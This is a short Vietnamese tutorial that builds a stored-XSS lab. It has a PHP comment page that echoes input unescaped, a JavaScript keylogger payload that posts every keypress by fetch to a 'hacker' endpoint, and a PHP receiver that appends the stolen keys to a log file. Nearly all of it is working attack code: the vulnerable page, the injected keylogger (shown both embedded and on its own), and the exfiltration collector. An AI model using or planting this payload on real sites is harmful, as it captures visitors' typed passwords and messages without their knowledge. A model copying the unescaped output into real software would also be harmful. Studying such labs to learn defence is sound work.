**Trang web có tồn tại lỗ hổng XSS** Trang web có tồn tại lỗ hổng Stored XSS Tạo 2 thư mục hacker và victim # Folder victim **index.php** ``` <!DOCTYPE html> <html lang="en"> <head> <meta charset="UTF-8"> <meta name="viewport" content="width=device-width, initial-scale=1.0"> <title>Victim site</title> </head> <body> <h1>Post a comment</h1> <form action="index.php" method="POST"> <label for="comment_title">Comment Title:</label> <br> <input type="text" name="comment_title"> <br> <br> <label for="comment_text">Comment:</label> <br> <textarea name="comment_text" rows="12" cols="70"></textarea> <br> <br> <input type="submit" value="Post comment"> <br> </form> <?php if (!$_POST["comment_title"]) { die("Nothing posted!"); }; ?> <h1>Processing the new post</h1> <div id="postarea"> <p>Here is what was posted.</p> <?php echo "<pre>"; print_r($_POST[""]); echo "</pre>"; ?> </div> <h2>New comments</h2> <div id="newcomment"> <?php echo "<h3>".$_POST["comment_title"]."</h3>"; echo "<p>".$_POST["comment_text"]."</p>"; ?> </div> <script> document.onkeypress = function(evt) { evt = evt || window.event; const key = String.fromCharCode(evt.charCode); if (key) { const param = encodeURI(key); fetch("http://localhost/hacker/keylog.php", { method: "POST", headers: { "Content-type": "application/x-www-form-urlencoded" }, body: "key=" + param }); } } </script> </body> </html> ```  **Tấn công XSS** ``` <script> document.onkeypress = function(evt) { evt = evt || window.event; const key = String.fromCharCode(evt.charCode); if (key) { const param = encodeURI(key); fetch("http://localhost/hacker/keylog.php", { method: "POST", headers: { "Content-type": "application/x-www-form-urlencoded" }, body: "key=" + param }); } } </script> ``` # Folder hacker **keylog.php** ``` <?php header("Access-Control-Allow-Origin *"); if (!empty($_POST["key"])) { $logfile = fopen("keylog.txt", "a+"); fwrite($logfile, $_POST["key"]); fclose($logfile); } ?> ```